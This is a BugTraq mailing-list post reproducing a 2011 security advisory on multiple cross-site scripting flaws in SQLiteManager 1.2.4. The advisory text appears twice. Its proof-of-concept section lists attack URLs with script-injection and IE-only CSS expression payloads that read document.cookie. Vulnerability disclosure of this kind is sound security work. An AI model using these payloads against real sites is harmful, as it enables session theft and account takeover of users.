BugTraq
Back to list
|
Post reply
SQLiteManager 1.2.4 Multiple Cross-Site-Scripting vulnerabilities
Jan 05 2012 05:32PM
security infoserve de
Advisory: SQLiteManager 1.2.4 Multiple Cross-Site-Scripting vulnerabilities
Advisory ID: INFOSERVE-ADV2011-12
Author: Stefan Schurtz
Contact: security (at) infoserve (dot) de [email concealed]
Affected Software: Successfully tested on SQLiteManager 1.2.4
Vendor URL: http://www.sqlitemanager.org/
Vendor Status: informed
==========================
Vulnerability Description
==========================
SQLiteManager 1.2.4 is prone to multiple Cross-site-Scripting vulnerabilities
==================
PoC-Exploit
==================
http://[target]/sqlite/main.php?dbsel='"</script><script>alert(document.
cookie)</script>
IE-only
http://[target]/sqlite/?nsextt=" stYle="x:expre/**/ssion(alert(document.cookie))
http://[target]/sqlite/index.php?dbsel=" stYle="x:expre/**/ssion(alert(document.cookie))
http://[target]/sqlite/index.php?nsextt=" stYle="x:expre/**/ssion(alert(document.cookie))
=========
Solution
=========
-
====================
Disclosure Timeline
====================
16-Dec-2011 - informed vendor
05-Jan-2012 - no feedback
========
Credits
========
Vulnerabilities found and advisory written by the INFOSERVE security team.
===========
References
===========
http://www.infoserve.de/system/files/advisories/INFOSERVE-ADV2011-12.txt
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
Advisory ID: INFOSERVE-ADV2011-12
Author: Stefan Schurtz
Contact: security (at) infoserve (dot) de [email concealed]
Affected Software: Successfully tested on SQLiteManager 1.2.4
Vendor URL: http://www.sqlitemanager.org/
Vendor Status: informed
==========================
Vulnerability Description
==========================
SQLiteManager 1.2.4 is prone to multiple Cross-site-Scripting vulnerabilities
==================
PoC-Exploit
==================
http://[target]/sqlite/main.php?dbsel='"</script><script>alert(document.
cookie)</script>
IE-only
http://[target]/sqlite/?nsextt=" stYle="x:expre/**/ssion(alert(document.cookie))
http://[target]/sqlite/index.php?dbsel=" stYle="x:expre/**/ssion(alert(document.cookie))
http://[target]/sqlite/index.php?nsextt=" stYle="x:expre/**/ssion(alert(document.cookie))
=========
Solution
=========
-
====================
Disclosure Timeline
====================
16-Dec-2011 - informed vendor
05-Jan-2012 - no feedback
========
Credits
========
Vulnerabilities found and advisory written by the INFOSERVE security team.
===========
References
===========
http://www.infoserve.de/system/files/advisories/INFOSERVE-ADV2011-12.txt
[ reply ]